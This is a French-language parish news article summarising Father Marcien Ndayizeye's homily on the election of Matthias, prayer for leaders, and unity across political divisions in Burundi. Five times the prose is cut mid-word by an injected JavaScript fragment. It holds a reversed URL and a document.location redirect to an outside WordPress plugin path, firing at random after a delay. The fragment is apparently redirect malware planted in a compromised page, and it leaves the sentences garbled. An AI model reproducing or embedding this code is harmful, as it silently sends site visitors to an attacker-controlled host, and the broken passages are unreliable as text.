Le célébrant principal, le Père Marcien NDAYIZEYE a rappelé qu’on venait de célébrer l’Ascension qui nous a fait entrer dans la prière de 9 jours, pendant lesquels on est dans le cénacle attendant la venue du Saint Esprit. Il a alors appelé les fideles  à prier beaucoup pour la protection contre les esprits mauvais pour bien célébrer la Pentecôte, un jour très important. Pour les saintes Écritures, la première lecture était tirée des Actes 1,15-17. 20a. 20c- 26 ; Ps 102, 1-2. 11-12. 19-20ab; la deuxième lecture était tirée de 1Jn 4, 11-16; et l’évangile était tirée de Jean 17, 11b- 19.

Homélie

Dans son homélie, le Père NDAYIZEYE a souligné l’adjonction de Matthias aux onze apôtres, pour le remplacement de Judas. Il a particulièrement fait remarquer les trois étapes suivis par les apôtres pour élire Matthias. D’abord on a présenté deux hommes: Joseph Barsabbas et Matthias. Deuxièmement, ils ont prié Dieu pour qu’Il leur toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne celui qui prendra la place que Judas avait délaissé. Troisièmement,  ils ont fait le tirage au sort, pour voir celui que Dieu a choisi. Il a alors averti que des fois les gens veulent faire leur choix. Pourtant malgré la multitude des disciples de Jésus, les apôtres ont d’abord prié pour laisser Dieu se choisir un serviteur, a fait remarquer le célébrant.

Saint Paul nous dit que c’est Dieu qui se choisit ceux à qui Il toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne le pouvoir ; que toute autorité vient de Dieu. Nous sommes alors appelés à prier beaucoup pour nos dirigeants partout où nous vivons, où nous travaillons, les dirigeants des pays, etc. Nous leur devons de l’obéissance et de la Prière, pour qu’ils marchent dans la vérité, a-t-il annoncé. Mais comment croire en tout cela quand des gens accèdent à des postes de responsabilité après avoir toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné de pots de vin, comment y croire quand des gens deviennent des dirigeants après avoir versé du sang, comment accepter cette autorité quand quelqu’un gagne accès à un post après avoir écarté de la compétition ses rivaux. Pourtant on entend toujours des gens se proclamant être béni par Dieu pour leur avoir toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné de belles maisons, de belles voitures, de postes, … alors que souvent tout est passé par la tricherie. Il ne faut pas mentir. Il faut plutôt prier pour la satisfaction de nos âmes, pour que nous soyons guidés par le Saint Esprit, pour que le Saint Esprit nous révèle ce qui est bon à faire ou à ne pas faire. Dans tout ce qu’on fait il faut toujours écouter Dieu, toujours implorer la présence divine dans tout ce qu’on fait et partout où on est, a insisté le Père Marcien. Pourtant il y a souvent des conflits pour autorité même dans les chorales, groupes de prières, renouveau charismatique, etc. Pourquoi ces conflits alors que nous devons tous travailler pour le même Dieu? Plutôt nos différences devraient être une richesse, on devrait plutôt se réjouir d’un toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}don qu’on trouve dans l’autre mais pas en soi, puisque cela va te compléter, a-t- il averti.

Père Marcien a aussi exhorté les Chrétiens à continuer à prier pour que Dieu  continue à bénir nos actes de charités et leurs fruits.  Il a rappelé que dans la 2eme lecture Saint Jean nous annonce que Dieu est amour ; et que par amour Il nous a crée en son image et  qu’Il a envoyé son fils unique pour nous sauver. Cet amour en plénitude n’est trouvé nulle part ailleurs qu’en Jésus Christ son Fils. Que nous nous comportions alors comme des enfants bien aimés, pour témoigner de cet amour que Dieu  nous aime à travers son Fils, Jésus Christ qui est la source même de l’amour, a-t- il lancé. Et toi aujourd’hui tu peux te demander en quoi tu es source: la jalousie, la haine, etc.? Pourquoi haïssons nous les autres a cause des parties politiques, les longueurs de nez, les postes politiques, etc.  Etre dans un différent parti politique ne devrait pas être un problème; il fallait plutôt se réjouir qu’il ya quelqu’un avec des idées différentes, puisqu’il peut te compléter car tu n’es pas tout. Nous devons grandir et comprendre que le Burundi nous appartient tous sans exception.  Nous sommes les mêmes, nous avons un seul Père. Et aujourd’hui c’est une occasion de retourner à Dieu puisque Satan n’a pas le pouvoir de nous maintenir dans l’esclavage de la haine, jalousie, etc., a-t- il exhorté.

Terminant son homélie, le Père NDAYIZEYE a appelé les Chrétiens à s’aimer les uns les autres d’un amour sincère: aimer l’autre juste puisqu’il est l’image de Dieu sans d’autres intérêts.  Comme cela, nous serons en train de vivre l’héritage que Jésus nous a laissé. Prions aussi pour ceux qui se sacrifient pour l’Evangile, puisque Jésus dit, « Je ne prie pas seulement pour eux, je prie aussi pour qui, grâce à leur parole croiront en moi ». Jn 17, 20. Le Père Marcien a terminé son homélie en exhortant les fidèles à être toujours dans l’unité des enfants de Dieu, unifiés par la puissance du Saint Esprit; et à demander la foi, d’être les gens d’amour et d’espoir, qui proclament le nom de Jésus pour que son nom soit loué éternellement. Amen !